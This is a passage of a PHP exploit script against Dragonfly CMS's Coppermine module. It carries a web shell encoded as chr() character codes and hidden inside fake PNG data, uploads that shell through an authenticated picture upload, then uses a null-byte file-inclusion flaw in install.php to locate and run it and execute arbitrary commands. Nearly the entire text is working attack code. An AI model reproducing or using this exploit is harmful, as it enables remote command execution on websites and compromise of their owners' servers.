       chr&#40;39&#41;. chr&#40;50&#41;. chr&#40;20&#41;. chr&#40;20&#41;. chr&#40;32&#41;. chr&#40;106&#41;.chr&#40;174&#41;.chr&#40;203&#41;.
       chr&#40;80&#41;. chr&#40;29&#41;. chr&#40;195&#41;.chr&#40;134&#41;.chr&#40;193&#41;.chr&#40;219&#41;.chr&#40;229&#41;.chr&#40;242&#41;.
       chr&#40;237&#41;.chr&#40;109&#41;.chr&#40;174&#41;.chr&#40;201&#41;.chr&#40;249&#41;.chr&#40;82&#41;. chr&#40;110&#41;.chr&#40;255&#41;.
       chr&#40;168&#41;.chr&#40;102&#41;.chr&#40;25&#41;. chr&#40;153&#41;.chr&#40;89&#41;. chr&#40;153&#41;.chr&#40;73&#41;. chr&#40;88&#41;.
       chr&#40;88&#41;. chr&#40;103&#41;.chr&#40;240&#41;.chr&#40;64&#41;. chr&#40;27&#41;. chr&#40;113&#41;.chr&#40;50&#41;. chr&#40;116&#41;.
       chr&#40;45&#41;. chr&#40;46&#41;. chr&#40;66&#41;. chr&#40;94&#41;. chr&#40;127&#41;.chr&#40;209&#41;.chr&#40;137&#41;.chr&#40;81&#41;.
       chr&#40;122&#41;.chr&#40;70&#41;. chr&#40;180&#41;.chr&#40;42&#41;. chr&#40;54&#41;. chr&#40;30&#41;. chr&#40;43&#41;. chr&#40;191&#41;.
       chr&#40;19&#41;. chr&#40;91&#41;. chr&#40;50&#41;. chr&#40;116&#41;.chr&#40;47&#41;. chr&#40;73&#41;. chr&#40;145&#41;.chr&#40;23&#41;.
       chr&#40;20&#41;. chr&#40;81&#41;. chr&#40;154&#41;.chr&#40;152&#41;.chr&#40;211&#41;.chr&#40;163&#41;.chr&#40;193&#41;.chr&#40;15&#41;.
       chr&#40;127&#41;.chr&#40;139&#41;.chr&#40;6&#41;.  chr&#40;111&#41;.chr&#40;87&#41;. chr&#40;103&#41;.chr&#40;65&#41;. chr&#40;37&#41;.
       chr&#40;201&#41;.chr&#40;251&#41;.chr&#40;40&#41;. chr&#40;107&#41;.chr&#40;244&#41;.chr&#40;121&#41;.chr&#40;172&#41;.chr&#40;183&#41;.
       chr&#40;59&#41;. chr&#40;133&#41;.chr&#40;103&#41;.chr&#40;137&#41;.chr&#40;120&#41;.chr&#40;151&#41;.chr&#40;202&#41;.chr&#40;100&#41;.
       chr&#40;163&#41;.chr&#40;127&#41;.chr&#40;43&#41;. chr&#40;236&#41;.chr&#40;170&#41;.chr&#40;188&#41;.chr&#40;12&#41;. chr&#40;94&#41;.
       chr&#40;25&#41;. chr&#40;90&#41;. chr&#40;85&#41;. chr&#40;10&#41;. chr&#40;100&#41;.chr&#40;188&#41;.chr&#40;147&#41;.chr&#40;9&#41;.
       chr&#40;164&#41;.chr&#40;169&#41;.chr&#40;199&#41;.chr&#40;139&#41;.chr&#40;193&#41;.chr&#40;100&#41;.chr&#40;104&#41;.chr&#40;37&#41;.
       chr&#40;220&#41;.chr&#40;179&#41;.chr&#40;68&#41;. chr&#40;2&#41;.  chr&#40;50&#41;. chr&#40;125&#41;.chr&#40;102&#41;.chr&#40;51&#41;.
       chr&#40;81&#41;. chr&#40;138&#41;.chr&#40;161&#41;.chr&#40;85&#41;. chr&#40;201&#41;.chr&#40;16&#41;. chr&#40;54&#41;. chr&#40;192&#41;.
       chr&#40;229&#41;.chr&#40;50&#41;. chr&#40;191&#41;.chr&#40;161&#41;.chr&#40;173&#41;.chr&#40;237&#41;.chr&#40;88&#41;. chr&#40;131&#41;.
       chr&#40;21&#41;. chr&#40;101&#41;.chr&#40;152&#41;.chr&#40;239&#41;.chr&#40;134&#41;.chr&#40;94&#41;. chr&#40;134&#41;.chr&#40;32&#41;.
       chr&#40;189&#41;.chr&#40;36&#41;. chr&#40;67&#41;. chr&#40;187&#41;.chr&#40;6&#41;.  chr&#40;147&#41;.chr&#40;225&#41;.chr&#40;183&#41;.
       chr&#40;128&#41;.chr&#40;120&#41;.chr&#40;77&#41;. chr&#40;141&#41;.chr&#40;234&#41;.chr&#40;94&#41;. chr&#40;98&#41;. chr&#40;9&#41;.
       chr&#40;56&#41;. chr&#40;212&#41;.chr&#40;54&#41;. chr&#40;88&#41;. chr&#40;110&#41;.chr&#40;187&#41;.chr&#40;147&#41;.chr&#40;100&#41;.
       chr&#40;120&#41;.chr&#40;245&#41;.chr&#40;157&#41;.chr&#40;201&#41;.chr&#40;112&#41;.chr&#40;51&#41;. chr&#40;38&#41;. chr&#40;22&#41;.
       chr&#40;198&#41;.chr&#40;215&#41;.chr&#40;88&#41;. chr&#40;247&#41;.chr&#40;222&#41;.chr&#40;143&#41;.chr&#40;45&#41;. chr&#40;131&#41;.
       chr&#40;119&#41;.chr&#40;151&#41;.chr&#40;77&#41;. chr&#40;246&#41;.chr&#40;213&#41;.chr&#40;149&#41;.chr&#40;185&#41;.chr&#40;13&#41;.
       chr&#40;86&#41;. chr&#40;151&#41;.chr&#40;225&#41;.chr&#40;0&#41;.  chr&#40;171&#41;.chr&#40;222&#41;.chr&#40;170&#41;.chr&#40;149&#41;.
       chr&#40;171&#41;.chr&#40;250&#41;.chr&#40;140&#41;.chr&#40;148&#41;.chr&#40;143&#41;.chr&#40;190&#41;.chr&#40;73&#41;. chr&#40;107&#41;.
       chr&#40;131&#41;.chr&#40;231&#41;.chr&#40;7&#41;.  chr&#40;213&#41;.chr&#40;215&#41;.chr&#40;98&#41;. chr&#40;86&#41;. chr&#40;201&#41;.
       chr&#40;214&#41;.chr&#40;186&#41;.chr&#40;103&#41;.chr&#40;65&#41;. chr&#40;43&#41;. chr&#40;62&#41;. chr&#40;65&#41;. chr&#40;65&#41;.
       chr&#40;65&#41;. chr&#40;65&#41;. chr&#40;65&#41;. chr&#40;239&#41;.chr&#40;123&#41;.chr&#40;86&#41;. chr&#40;96&#41;. chr&#40;150&#41;.
       chr&#40;72&#41;. chr&#40;78&#41;. chr&#40;74&#41;. chr&#40;251&#41;.chr&#40;245&#41;.chr&#40;62&#41;. chr&#40;146&#41;.chr&#40;225&#41;.
       chr&#40;31&#41;. chr&#40;136&#41;.chr&#40;175&#41;.chr&#40;131&#41;.chr&#40;53&#41;. chr&#40;147&#41;.chr&#40;225&#41;.chr&#40;191&#41;.
       chr&#40;204&#41;.chr&#40;25&#41;. chr&#40;245&#41;.chr&#40;65&#41;. chr&#40;60&#41;. chr&#40;63&#41;. chr&#40;112&#41;.chr&#40;104&#41;.
       chr&#40;112&#41;.chr&#40;32&#41;. chr&#40;101&#41;.chr&#40;99&#41;. chr&#40;104&#41;.chr&#40;111&#41;.chr&#40;34&#41;. chr&#40;72&#41;.
       chr&#40;105&#41;.chr&#40;77&#41;. chr&#40;97&#41;. chr&#40;115&#41;.chr&#40;116&#41;.chr&#40;101&#41;.chr&#40;114&#41;.chr&#40;33&#41;.
       chr&#40;34&#41;. chr&#40;59&#41;. chr&#40;111&#41;.chr&#40;98&#41;. chr&#40;95&#41;. chr&#40;99&#41;. chr&#40;108&#41;.chr&#40;101&#41;.
       chr&#40;97&#41;. chr&#40;110&#41;.chr&#40;40&#41;. chr&#40;41&#41;. chr&#40;59&#41;. chr&#40;105&#41;.chr&#40;110&#41;.chr&#40;105&#41;.
       chr&#40;95&#41;. chr&#40;115&#41;.chr&#40;101&#41;.chr&#40;116&#41;.chr&#40;40&#41;. chr&#40;34&#41;. chr&#40;109&#41;.chr&#40;97&#41;.
       chr&#40;120&#41;.chr&#40;95&#41;. chr&#40;101&#41;.chr&#40;120&#41;.chr&#40;101&#41;.chr&#40;99&#41;. chr&#40;117&#41;.chr&#40;116&#41;.
       chr&#40;105&#41;.chr&#40;111&#41;.chr&#40;110&#41;.chr&#40;95&#41;. chr&#40;116&#41;.chr&#40;105&#41;.chr&#40;109&#41;.chr&#40;101&#41;.
       chr&#40;34&#41;. chr&#40;44&#41;. chr&#40;48&#41;. chr&#40;41&#41;. chr&#40;59&#41;. chr&#40;112&#41;.chr&#40;97&#41;. chr&#40;115&#41;.
       chr&#40;115&#41;.chr&#40;116&#41;.chr&#40;104&#41;.chr&#40;114&#41;.chr&#40;117&#41;.chr&#40;40&#41;. chr&#40;36&#41;. chr&#40;95&#41;.
       chr&#40;71&#41;. chr&#40;69&#41;. chr&#40;84&#41;. chr&#40;91&#41;. chr&#40;99&#41;. chr&#40;109&#41;.chr&#40;100&#41;.chr&#40;93&#41;.
       chr&#40;41&#41;. chr&#40;59&#41;. chr&#40;100&#41;.chr&#40;105&#41;.chr&#40;101&#41;.chr&#40;40&#41;. chr&#40;41&#41;. chr&#40;59&#41;.
       chr&#40;63&#41;. chr&#40;62&#41;. chr&#40;73&#41;. chr&#40;69&#41;. chr&#40;78&#41;. chr&#40;68&#41;. chr&#40;65&#41;. chr&#40;65&#41;.
       chr&#40;65&#41;;

$dAtA =&quot;-----------------------------7d63992eb01c6&#92;r&#92;n&quot;;
$dAtA.=&quot;Content-Disposition: form-data; name=&#92;&quot;event&#92;&quot;&#92;r&#92;n&#92;r&#92;n&quot;;
$dAtA.=&quot;picture&#92;r&#92;n&quot;;
$dAtA.=&quot;-----------------------------7d63992eb01c6&#92;r&#92;n&quot;;
$dAtA.=&quot;Content-Disposition: form-data; name=&#92;&quot;album&#92;&quot;&#92;r&#92;n&#92;r&#92;n&quot;;
$dAtA.=$album.&quot;&#92;r&#92;n&quot;;
$dAtA.=&quot;-----------------------------7d63992eb01c6&#92;r&#92;n&quot;;
$dAtA.=&quot;Content-Disposition: form-data; name=&#92;&quot;MAX_FILE_SIZE&#92;&quot;&#92;r&#92;n&#92;r&#92;n&quot;;
$dAtA.=&quot;1048576&#92;r&#92;n&quot;;
$dAtA.=&quot;-----------------------------7d63992eb01c6&#92;r&#92;n&quot;;
$dAtA.=&quot;Content-Disposition: form-data; name=&#92;&quot;userpicture&#92;&quot;; filename=&#92;&quot;C:&#92;suntzooo.png&#92;&quot;&#92;r&#92;n&quot;;
$dAtA.=&quot;Content-Type: image/x-png&#92;r&#92;n&#92;r&#92;n&quot;;
$dAtA.=$SHELL.&quot;&#92;r&#92;n&quot;;
$dAtA.=&quot;-----------------------------7d63992eb01c6&#92;r&#92;n&quot;;
$dAtA.=&quot;Content-Disposition: form-data; name=&#92;&quot;title&#92;&quot;&#92;r&#92;n&#92;r&#92;n&quot;;
$dAtA.=&quot;suntzu&#92;r&#92;n&quot;;
$dAtA.=&quot;-----------------------------7d63992eb01c6&#92;r&#92;n&quot;;
$dAtA.=&quot;Content-Disposition: form-data; name=&#92;&quot;caption&#92;&quot;&#92;r&#92;n&#92;r&#92;n&quot;;
$dAtA.=&quot;suntzoi&#92;r&#92;n&quot;;
$dAtA.=&quot;-----------------------------7d63992eb01c6&#92;r&#92;n&quot;;
$dAtA.=&quot;Content-Disposition: form-data; name=&#92;&quot;keywords&#92;&quot;&#92;r&#92;n&#92;r&#92;n&quot;;
$dAtA.=&quot;sun-tzuuuu&#92;r&#92;n&quot;;
$dAtA.=&quot;-----------------------------7d63992eb01c6&#92;r&#92;n&quot;;
$dAtA.=&quot;Content-Disposition: form-data; name=&#92;&quot;user1&#92;&quot;&#92;r&#92;n&#92;r&#92;n&#92;r&#92;n&quot;;
$dAtA.=&quot;-----------------------------7d63992eb01c6&#92;r&#92;n&quot;;
$dAtA.=&quot;Content-Disposition: form-data; name=&#92;&quot;user2&#92;&quot;&#92;r&#92;n&#92;r&#92;n&#92;r&#92;n&quot;;
$dAtA.=&quot;-----------------------------7d63992eb01c6&#92;r&#92;n&quot;;
$dAtA.=&quot;Content-Disposition: form-data; name=&#92;&quot;user3&#92;&quot;&#92;r&#92;n&#92;r&#92;n&#92;r&#92;n&quot;;
$dAtA.=&quot;-----------------------------7d63992eb01c6&#92;r&#92;n&quot;;
$dAtA.=&quot;Content-Disposition: form-data; name=&#92;&quot;user4&#92;&quot;&#92;r&#92;n&#92;r&#92;n&#92;r&#92;n&quot;;
$dAtA.=&quot;-----------------------------7d63992eb01c6--&#92;r&#92;n&quot;;
$pAcKeT=&quot;POST &quot;.$p.&quot;index.php?name=coppermine&amp;file=db_input&amp;event=picture HTTP/1.1&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Content-Type: multipart/form-data; boundary=---------------------------7d63992eb01c6&#92;r&#92;n&quot;;
$pAcKeT.=&quot;User-Agent: suntzu touches dragonfly with his finger&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Cookie: $COOKIE&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Host: &quot;.$host.&quot;&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Content-Length: &quot;.strlen&#40;$dAtA&#41;.&quot;&#92;r&#92;n&quot;;
$pAcKeT.=&quot;Connection: Close&#92;r&#92;n&#92;r&#92;n&quot;;
$pAcKeT.=$dAtA;
show&#40;$pAcKeT&#41;;
sendpacketii&#40;$pAcKeT&#41;;
if &#40;eregi&#40;&quot;no album where you are allowed to upload&quot;,$HtMl&#41;&#41;{
  die&#40;&quot;Something goes wrong...maybe you have not upload rights...&lt;br&gt;&quot;&#41;;
  }


# STEP 5 -&gt; Lookin&#39; for a php[some hex values].tmp file and launch commands...
# we will create a suntzu.tmp file in dragonfly main root with the filename
# so we have not to search the shell next time the exploit is launched

for &#40;$i=0; $i&lt;=15; $i++&#41; {
  for &#40;$j=0; $j&lt;=15; $j++&#41; {
    $x=$i;
    if &#40;$i&gt;9&#41; {$temp=dechex&#40;$i&#41;;
               $x=$temp;}
    $y=$j;
    if &#40;$j&gt;9&#41; {$temp=dechex&#40;$j&#41;;
               $y=$temp;}
    $filepath=&quot;../modules/coppermine/albums/userpics/php&quot;.$x.$y.&quot;.tmp&quot;.chr&#40;0x00&#41;;
    $filepath=urlencode&#40;$filepath&#41;;

    //a test command...this should works both on Win and Linux boxes...
    $cmdtest=&quot;echo filename:php$x$y.tmp&gt; suntzu.tmp&quot;;

    $cmdtest=urlencode&#40;$cmdtest&#41;;
    $pAcKeT=&quot;GET &quot;.$p.&quot;install.php?cmd=$cmdtest&amp;newlang=$filepath HTTP/1.1&#92;r&#92;n&quot;;
    $pAcKeT.=&quot;Host: &quot;.$host.&quot;&#92;r&#92;n&quot;;
    $pAcKeT.=&quot;User-Agent: Mata Hari/2.00&#92;r&#92;n&quot;;
    $pAcKeT.=&quot;Connection: Close&#92;r&#92;n&#92;r&#92;n&quot;;
    show&#40;$pAcKeT&#41;;
    sendpacketii&#40;$pAcKeT&#41;;refresh&#40;&#41;;
    $pAcKeT=&quot;GET &quot;.$p.&quot;suntzu.tmp HTTP/1.1&#92;r&#92;n&quot;;
    $pAcKeT.=&quot;Host: &quot;.$host.&quot;&#92;r&#92;n&quot;;
    $pAcKeT.=&quot;Connection: Close&#92;r&#92;n&#92;r&#92;n&quot;;
    show&#40;$pAcKeT&#41;;
    sendpacketii&#40;$pAcKeT&#41;;refresh&#40;&#41;;
    if &#40;eregi&#40;&quot;filename:&quot;,$HtMl&#41;&#41; {
         echo&#40;&quot;Exploit succeeded...Now launch desired command...&lt;br&gt;&quot;&#41;;
         $temp=explode&#40;&quot;filename:&quot;,$HtMl&#41;;
         $temp2=explode&#40;&quot;.tmp&quot;,$temp[1]&#41;;
         $filename=$temp2[0].&quot;.tmp&quot;;
         $filepath=&quot;../../modules/coppermine/albums/userpics/&quot;.$filename.chr&#40;0x00&#41;;
         $filepath=urlencode&#40;$filepath&#41;;
         $pAcKeT=&quot;GET &quot;.$p.&quot;install.php?cmd=$CMD&amp;newlang=$filepath HTTP/1.1&#92;r&#92;n&quot;;
         $pAcKeT.=&quot;Host: &quot;.$host.&quot;&#92;r&#92;n&quot;;
         $pAcKeT.=&quot;User-Agent: minibot&#92;r&#92;n&quot;;
         $pAcKeT.=&quot;Connection: Close&#92;r&#92;n&#92;r&#92;n&quot;;
         show&#40;$pAcKeT&#41;;
         sendpacketii&#40;$pAcKeT&#41;;die;
                                 }
                         }
                       }
  //if you are here...
  echo &quot;Exploit failed... maybe we have magic_quotes_gpc on here or dragonfly patched...&quot;;

}
else
{echo "Fill * required fields, optionally specify a proxy…";}
?>